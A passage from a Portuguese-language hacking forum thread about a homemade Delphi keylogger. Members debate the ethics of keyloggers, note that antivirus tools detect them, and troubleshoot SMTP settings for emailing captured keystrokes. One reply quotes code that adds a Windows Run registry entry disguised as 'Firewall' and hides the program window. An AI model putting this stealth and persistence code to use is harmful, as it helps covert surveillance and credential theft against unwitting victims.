[Code] Xtreme Keylogger

Started by Hacker Xtreme, 31 de October , 2006, 08:15:16 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

shake

"keylogger para o fórum é como carne pra piranha..."
hehehe!
Sei que isso não é de rir mas, é engraçado!
l u b c k e eu acho que é triste mesmo!
Num sei que isso mas pra mim que estou em processo de aprendizagem pode ser de um bom valor isso.
Não sou e nem pretenderei sair por ai distribuindo trojans, keyloggers, vírus e afins mas me interessa saber como eles são feitos e funcionam!

Mas é isso ai!
Vivendo e aprendendo...
Errando e se ...!
hehe
Abraços

l u b c k e

A questão de aprendizado é um ato louvável, mas entre em 10 fóruns "hackers"... os tópicos mais visitados e comentados serão sobre keylogger e anonimato.

Tirem suas próprias conclusões...

Até mais...

Contato]

tiaguito-.-

Concordo com o l u b c k e e com o branco,na minha opnião, KL é uma perda de tempo para tentar se usar contra uma pessoa, como eu próprio falei neste tópico a melhor coisa nisso é, pra mim, o código que havia coisas que eu não sabia ali.o KL é uma perda de tempo pois qualquer antívirus que se preze tem alto cuidado com keyloggers e como todos eles tem uma base de código parecido, pros AV's fikando bem mais "fácil" de axar algum código malicioso.
Não tenho medo do escuro, nem do que tem nele, medo do escuro é pra fracos, e vc é um?
Meu MSN ta ali, se quiser add, add mais nun fala bosta não =P

anakim

kra eu ja fiz tanta coisa q eu podia usar contra as pessoas, e nao faco isso fazia, nem ligava se eu formatasse hd, tipo eu gosto de ver como funciona mais usar pra fins maldosos nunca usei, eu gosto da funcoes e tal mais prejudicar as pessoas nao sou desse tipo, nunca me interessei em fazer essas coisa, e outra Seing nem gosto nem nunca me interessei eh coisa d lammer, coisa d vagabundo, flws!!1
Why use Windows? If I have the door ;-)

branco

mudando um pouco de assunto, alguem viu o pastor da banda comparando os programadores do mal com traficantes e assassinos ? e ainda disse que na internet as empresas fazem como se fosse a policia contratando assassinos, pessoas com demonios etc só porque contratam os hackers =p

minha net que volto agora...alguem sabe o orkut ou email dele ? velho...
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

OnlyOne

eu acredito q todo tipo de ferrementa e valida , o q ocorre e q a medida q o tempo passa e vc cresce , muda a sua forma de trabalhar com elas .....
No céu toca Joy Division

abobre

Primeiramente gostaria de dar os meus parabens para o Hacker Xtreme por ter codado o seu proprio KL.
 Pra quem está estudando Delphi acho uma grande vitoria conseguir codar o seu proprio KL, claro que falta algumas funções, mas com o tempo o Hacker Xtreme vai implementando as funções no KL...

Agora gostaria apenas de informar aos membros [Eclipse]  &  shake
que informaram que estava dando erro na hora de compilar.
 Não sei qual é o nivel de vcs com o delphi(sou iniciante no delphi tbm) entao vou tentar ser bem claro.

Ante de copiar e colar o codigo no delphi nos temos que entender se ele usa algum tipo de componente e se usar devemos incluir no aplicativo.

De cara nos podemos perceber que ele usa os seguintes componetes :

3 Timmer's
 2 memo's
 1 IdMessage
 1 IdSMTP

Não edite os nomes do componente pq se não vai gerar um erro no aplicativo e vc não vai conseguir compilar.

Recomendo que vc adicione um codigo por vez na mesma sequencia que o codigo exigi.

Boa sorte.

rodweb

Quote from: "abobre"Primeiramente gostaria de dar os meus parabens para o Hacker Xtreme por ter codado o seu proprio KL.
 Pra quem está estudando Delphi acho uma grande vitoria conseguir codar o seu proprio KL, claro que falta algumas funções, mas com o tempo o Hacker Xtreme vai implementando as funções no KL...

Agora gostaria apenas de informar aos membros [Eclipse]  &  shake
que informaram que estava dando erro na hora de compilar.
 Não sei qual é o nivel de vcs com o delphi(sou iniciante no delphi tbm) entao vou tentar ser bem claro.

Ante de copiar e colar o codigo no delphi nos temos que entender se ele usa algum tipo de componente e se usar devemos incluir no aplicativo.

De cara nos podemos perceber que ele usa os seguintes componetes :

3 Timmer's
 2 memo's
 1 IdMessage
 1 IdSMTP

Não edite os nomes do componente pq se não vai gerar um erro no aplicativo e vc não vai conseguir compilar.

Recomendo que vc adicione um codigo por vez na mesma sequencia que o codigo exigi.

Boa sorte.

Eu coloquei um código de cada vez, troquei o nome dos componentes e tal...mais acho que foi aquilo que o OnlyOne disse, tem que autenticar pelo pop3 primeiro, e eu tinha usado só o bol pra testar...
Depois mudei pra terra, gmail e tbm deu erro, deve ser o mesmo problema, vou ver outro email pra testar...

Flws...

TGA

TGA

Se vc testou o terra, esse naum é o problema, o terra naum presisa autenticar no POP  ;)
"A IMAGINAÇÃO É MAIS IMPORTANTE QUE O CONHECIMENTO"

rodweb

Não sei o que é então, com os 3 que eu tentei da erro no mesmo lugar com menssagem diferente...

abobre

Comigo nao deu o erro, fiz da mesma forma que eu postei....

Usei o email do gmail, sem erros..

Abraços

rodweb

olha, eu só troquei a porta, o smtp, o login e senha e continua dando erro, até mesmo no gmail...

http://img235.imageshack.us/img235/1781/imagemut6.jpg

abobre

Só pra saber, vc foi no evento OnCreate do forum1 e colocou o seguinte code:

Quoteprocedure TForm1.FormCreate(Sender: TObject);
var
Str : String;
begin
// Cria uma entrada no registro para poder inicializar com o sistema...
Reg := TRegistry.Create;
Reg.RootKey := HKEY_LOCAL_MACHINE;
Reg.Openkey('Software\Microsoft\Windows\CurrentVer sion\Run', False);
Reg.WriteString('Firewall', Application.ExeName);
Reg.CloseKey;
// Deixa o Keylogger Invisível...
Application.ShowMainForm := False;
end;

Até +

rodweb

abobre

[Eclipse]

Faça isso então e tente compilar o code.

Abraços